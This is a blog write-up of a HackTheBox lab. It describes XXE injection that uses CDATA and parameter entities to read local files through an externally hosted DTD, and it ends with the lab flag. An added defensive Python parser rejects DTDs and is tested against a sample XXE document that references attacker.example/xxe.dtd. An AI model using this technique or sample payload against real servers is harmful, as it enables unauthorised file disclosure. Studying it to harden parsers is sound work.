Huy Phu

Summary

The article discusses advanced techniques for local file disclosure in web applications using XXE (XML External Entity) Injection, applicable to non-PHP applications, and demonstrates how to exfiltrate data using CDATA and XML Parameter Entities.

Abstract

The author of the blog post previously covered how to exploit XXE Injection vulnerabilities to read local files on a target machine, specifically in PHP-based web applications. In this follow-up post, the author addresses the challenge of applying similar techniques to non-PHP applications. The article introduces an advanced method for local file disclosure that involves wrapping file content within a CDATA tag to bypass XML formatting restrictions. It also explains the concept of XML Parameter Entities, which are defined within a DTD (Document Type Definition) and can be used to reference external entities, such as files on an attacking machine. The post provides a step-by-step guide on how to exploit the vulnerability using Burp Suite, detailing how to inject a payload that references an externally hosted xxe.dtd file. This file contains parameter entities that, when combined, allow for the exfiltration of file contents, including sensitive information like flags stored in /flag.txt. The technique is demonstrated with screenshots, and the article concludes with the successful retrieval of the flag, showcasing the practical application of the described method.

Opinions

  • The author believes that XXE Injection is a powerful attack vector that can be adapted to various web application environments, not just PHP.
  • There is an emphasis on the versatility of XML Parameter Entities for data exfiltration, highlighting their ability to bypass certain security measures.
  • The author suggests that the use of Burp Suite is an effective way to test and exploit XXE vulnerabilities, indicating a preference for this tool among security professionals.
  • The inclusion of practical examples and screenshots reflects the author's view that hands-on demonstrations are valuable for understanding complex security concepts.
  • By providing a specific example of obtaining a flag from /flag.txt, the author implies that these techniques are directly applicable to penetration testing scenarios, such as those encountered on platforms like HackTheBox.

HackTheBox — Web Attacks: From XXE Injection to Advanced Local File Disclosure

In my previous blog post, HackTheBox — Web Attacks: From XXE Injection to Local File Disclosure, I went over how to use XXE Injection to read local files from the target machine. However, the technique from that post only applies to web applications that use PHP. What happens if the target application does not use PHP? This blog post will go over another technique for disclosing local files.

To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA tag (e.g. <![CDATA[ FILE_CONTENT ]]>). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.

Advanced Exfiltration with CDATA

XML Parameter Entities

This is a special type of entity that starts with a % character and can only be used within the DTD (Document Type Definition). What is unique about parameter entities is that if we reference them from an external source (e.g., our own server), all of them are treated as external and can be concatenated into a single entity, as follows:

<!ENTITY joined "%begin;%file;%end;">

We can store this in an xxe.dtd file that is hosted on the attacking machine.

Exploit the vulnerability

In Burp Suite, inject the XML entity payload that references the xxe.dtd file hosted on the attacking machine.

The payload in the above screenshot is built in five steps:
(1) prepend the beginning of the CDATA tag
(2) reference the external file
(3) append the end of the CDATA tag
(4) reference our external DTD
(5) reference the &joined; entity to print the file content

Once we send the request, we get the response on the right side, which displays the content of the requested file.
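For the defending side, the whole technique above depends on the server's XML parser being willing to process a DTD: without a DOCTYPE there is nowhere to declare %begin;, %file; and %end;, and nothing that fetches an external xxe.dtd. The following is an added example (not code from the original post) of an intake routine that parses client-supplied XML with Python's standard-library expat parser, rejects any document that carries a DOCTYPE, and additionally disables parameter-entity parsing and external entity resolution as defence in depth. The sample documents are constructed for the example, and the host name in the rejected sample is a placeholder; ordinary CDATA in a benign document still parses as raw text.

```python
"""Hardened XML intake for a web endpoint that must accept client-supplied XML.

Added example, not code from the original post. Any document carrying a
DOCTYPE is refused, so no internal, external or parameter entity can ever be
declared, and expat is told never to parse parameter entities or resolve
external references even if a DTD somehow got through.
"""
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when an inbound document tries to declare a DTD."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse `data` into {element_name: text} with all DTD processing disabled.

    Raises DtdRejected on any DOCTYPE, and expat.ExpatError if the parser is
    nevertheless asked to resolve an external entity.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # The endpoint has no reason to accept DTDs from clients: fail closed.
        raise DtdRejected(f"DOCTYPE {name!r} is not permitted")

    parser.StartDoctypeDeclHandler = on_doctype
    # Defence in depth: never expand %param; entities and never fetch
    # SYSTEM/PUBLIC identifiers. Returning 0 from the external entity
    # handler makes expat abort the parse with an ExpatError.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0

    result: dict = {}
    stack: list = []

    def start(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def chars(text):
        # Character data (including CDATA sections) may arrive in chunks.
        if stack:
            result[stack[-1]] += text

    def end(name):
        stack.pop()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return {k: v.strip() for k, v in result.items()}


def is_accepted(data: bytes) -> bool:
    """True if the document parses under the hardened settings, False if rejected."""
    try:
        parse_untrusted_xml(data)
        return True
    except (DtdRejected, expat.ExpatError):
        return False


# Constructed samples (not from the original post).
BENIGN = b"<contact><name>Alice</name><email>alice@example.com</email></contact>"

# CDATA in a normal document is still plain text to the parser.
CDATA_DOC = b"<note><body><![CDATA[ a < b && c ]]></body></note>"

# A document of the shape the post describes: a parameter entity pointing at an
# externally hosted DTD. The host name is a placeholder, not a real server.
EXTERNAL_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE contact [ <!ENTITY % ext SYSTEM "http://attacker.example/xxe.dtd"> %ext; ]>'
    b"<contact><name>&joined;</name></contact>"
)

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN))
    print(parse_untrusted_xml(CDATA_DOC))
    print("external DTD accepted:", is_accepted(EXTERNAL_DTD))
```

Rejecting the DOCTYPE outright is the simplest effective control; the `SetParamEntityParsing` and `ExternalEntityRefHandler` settings cost nothing and protect a code path that later refactoring might accidentally re-enable. A rejected document is also a good thing to log, since legitimate clients of a JSON-or-XML API almost never send DTDs.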

Using the same technique, we can obtain the flag in /flag.txt:

HTB{3rr0r5_c4n_l34k_d474}

Hackthebox
Bug Bounty
Web Security
Xxe Attack
Owasp Top 10